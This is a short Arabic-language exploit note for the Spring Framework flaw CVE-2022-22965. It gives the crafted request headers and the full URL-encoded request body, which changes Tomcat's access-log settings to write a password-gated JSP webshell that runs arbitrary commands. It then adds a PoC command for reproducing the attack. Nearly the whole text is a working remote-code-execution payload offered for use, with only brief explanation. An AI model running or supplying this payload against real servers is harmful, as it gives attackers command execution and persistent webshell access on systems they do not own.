
بيئة RCE الخاصة بـ Spring لـ CVE-2022-22965
معلومات البيئة
تكوين رؤوس الطلب
"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded",
بيانات جسم الطلب
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=myshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
بعد إرسال المحتوى أعلاه، يمكنك بنجاح كتابة webshell على النظام المستهدف، وعادةً ما يكون في المسار webapps\ROOT\myshell.jsp
إذا كان المسار قابلًا للتحكم، يمكنك كتابة أي ملف تريده عن طريق تغيير الحمولة
ويتم ذلك أساسًا عبر تعديل تنسيق سجلات tomcat لكتابة shell على شكل سجلات
لتسهيل إعادة الإنتاج، يمكنك مباشرة استخدام poc التالي
python3 poc.py http://test.com/hello